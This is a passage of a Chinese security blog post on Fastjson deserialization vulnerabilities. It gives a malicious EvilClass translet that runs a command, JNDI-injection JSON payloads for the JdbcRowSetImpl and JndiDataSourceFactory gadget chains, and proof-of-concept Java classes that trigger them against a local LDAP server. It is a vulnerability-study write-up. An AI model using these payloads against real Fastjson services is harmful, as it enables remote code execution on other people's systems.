import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class EvilClass extends AbstractTranslet &#123;
    public void transform(DOM var1, SerializationHandler[] var2) throws TransletException &#123;
    &#125;

    public void transform(DOM var1, DTMAxisIterator var2, SerializationHandler var3) throws TransletException &#123;
    &#125;

    static &#123;
        try &#123;
            System.out.println(&quot;1231231&quot;);
            Runtime.getRuntime().exec(&quot;calc&quot;);
        &#125; catch (IOException var1) &#123;
            throw new RuntimeException(var1);
        &#125;
    &#125;
&#125;</code></pre>

<p>‍</p>
<h3 id="JdbcRowSetImpl"><a href="#JdbcRowSetImpl" class="headerlink" title="JdbcRowSetImpl"></a><span id="20251005151240-oj1nwel" style="display: none;"></span>JdbcRowSetImpl</h3><ul>
<li>这里和 <code>SnakeYAML</code> 的链子是一样的，我就照抄了</li>
</ul>
<p>影响版本：<code>fastjson &lt;= 1.2.24</code></p>
<p><code>com.sun.rowset.JdbcRowSetImpl</code>​ 这条利用链是由于 <code>javax.naming.InitialContext#lookup()</code> 方法的参数可控导致的 JNDI 注入</p>
<p>由前文知道，YAML 反序列化的入口类很大概率是无参构造方法或者是 <code>setter</code> 方法</p>
<p>这里跟着网上找到了这个 <code>setAutoCommit</code>​ 的 <code>setter</code>​ 方法，在里面调用了 <code>connect()</code> 方法</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251003143909.png" alt="image"></p>
<p>跟进方法可以看到这里有 <code>lookup</code>​ 方法进行 JNDI 远程调用，参数是 <code>getDataSourceName</code> 方法，继续跟进</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251003144017.png" alt="image"></p>
<p>发现只要将 <code>dataSource</code> 设置成恶意的 JNDI 地址就可以</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251003144205.png" alt="image"></p>
<p><strong>payload</strong></p>
<pre class="line-numbers language-json" data-language="json" data-start="1"><code class="language-json">&#123;
	&quot;@type&quot;:&quot;com.sun.rowset.JdbcRowSetImpl&quot;,
	&quot;dataSourceName&quot;:&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass&quot;,
	&quot;autoCommit&quot;:true
&#125;</code></pre>

<h4 id="调用链-1"><a href="#调用链-1" class="headerlink" title="调用链"></a>调用链</h4><pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">JdbcRowSetImpl#setAutoCommit()
- JdbcRowSetImpl#connect()
-- JdbcRowSetImpl#lookup()</code></pre>

<h4 id="测试实现-1"><a href="#测试实现-1" class="headerlink" title="测试实现"></a>测试实现</h4><pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import com.alibaba.fastjson.JSON;

public class Poc &#123;
    public static void main(String[] args) &#123;
        String poc &#x3D; &quot;&#123;\n&quot; +
                &quot;\t\&quot;@type\&quot;:\&quot;com.sun.rowset.JdbcRowSetImpl\&quot;,\n&quot; +
                &quot;\t\&quot;dataSourceName\&quot;:\&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass\&quot;,\n&quot; +
                &quot;\t\&quot;autoCommit\&quot;:true\n&quot; +
                &quot;&#125;&quot;;
        JSON.parse(poc);
    &#125;
&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005152341.png" alt="image"></p>
<p>‍</p>
<h3 id="JndiDataSourceFactory"><a href="#JndiDataSourceFactory" class="headerlink" title="JndiDataSourceFactory"></a><span id="20251005151315-1jmydr0" style="display: none;"></span>JndiDataSourceFactory</h3><p>影响版本：<code>1.2.25 &lt;= fastjson &lt;= 1.2.45</code></p>
<p>这个类需要服务端有 <code>mybatis</code> 依赖 jar 包</p>
<pre class="line-numbers language-markup" data-language="markup" data-start="1"><code class="language-markup">&lt;dependency&gt;
    &lt;groupId&gt;org.mybatis&lt;&#x2F;groupId&gt;
    &lt;artifactId&gt;mybatis&lt;&#x2F;artifactId&gt;
    &lt;version&gt;3.5.13&lt;&#x2F;version&gt;
&lt;&#x2F;dependency&gt;</code></pre>

<p>看源码，很容易就看到可以控制 <code>lookup</code> 的参数</p>
<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005170944.png" alt="image"></p>
<p><strong>payload</strong></p>
<pre class="line-numbers language-json" data-language="json" data-start="1"><code class="language-json">&#123;
	&quot;@type&quot;:&quot;org.apache.ibatis.datasource.jndi.JndiDataSourceFactory&quot;,
	&quot;properties&quot;:&#123;&quot;data_source&quot;:&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass&quot;&#125;
&#125;</code></pre>

<h4 id="调用链-2"><a href="#调用链-2" class="headerlink" title="调用链"></a>调用链</h4><pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">JndiDataSourceFactory#setProperties(Properties)
- InitialContext#lookup(String)</code></pre>

<h4 id="测试实现-2"><a href="#测试实现-2" class="headerlink" title="测试实现"></a>测试实现</h4><pre class="line-numbers language-java" data-language="java" data-start="1"><code class="language-java">import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class Poc &#123;
    public static void main(String[] args) &#123;
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        String poc &#x3D; &quot;&#123;\n&quot; +
                &quot;\t\&quot;@type\&quot;:\&quot;org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\&quot;,\n&quot; +
                &quot;\t\&quot;properties\&quot;:&#123;\&quot;data_source\&quot;:\&quot;ldap:&#x2F;&#x2F;127.0.0.1:8003&#x2F;EvilClass\&quot;&#125;\n&quot; +
                &quot;&#125;&quot;;
        JSON.parse(poc);
    &#125;
&#125;</code></pre>

<p><img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/20251005171122.png" alt="image"></p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>参考</p>
<p><a target="_blank" rel="noopener" href="https://www.javasec.org/java-vuls/FastJson.html">Fastjson 反序列化漏洞 · 攻击Java Web应用-Java Web安全</a></p>
<p><a target="_blank" rel="noopener" href="https://changeyourway.github.io/2024/09/18/Java%20%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E%E7%AF%87-Fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93">漏洞篇 - Fastjson 反序列化 - 妙尽璇机</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Marin</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://wwwmarin.xyz/2025/10/05/fastjson-fan-xu-lie-hua/">https://wwwmarin.xyz/2025/10/05/fastjson-fan-xu-lie-hua/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Marin</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/web/">
                                    <span class="chip bg-color">web</span>
                                </a>
                            
                                <a href="/tags/java/">
                                    <span class="chip bg-color">java</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2025/11/07/hackthebox/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/fdd81ab4e06b3b576916484ce1da2b81.jpg" class="responsive-img" alt="Hackthebox">
                        
                        <span class="card-title">Hackthebox</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2025-11-07
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WEB/" class="post-category">
                                    WEB
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/%E5%88%B7%E9%A2%98/">
                        <span class="chip bg-color">刷题</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2025/10/01/snakeyaml-fan-xu-lie-hua/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/3635372_95770536_p0.png" class="responsive-img" alt="SnakeYAML 反序列化">
                        
                        <span class="card-title">SnakeYAML 反序列化</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2025-10-01
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WEB/" class="post-category">
                                    WEB
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/java/">
                        <span class="chip bg-color">java</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
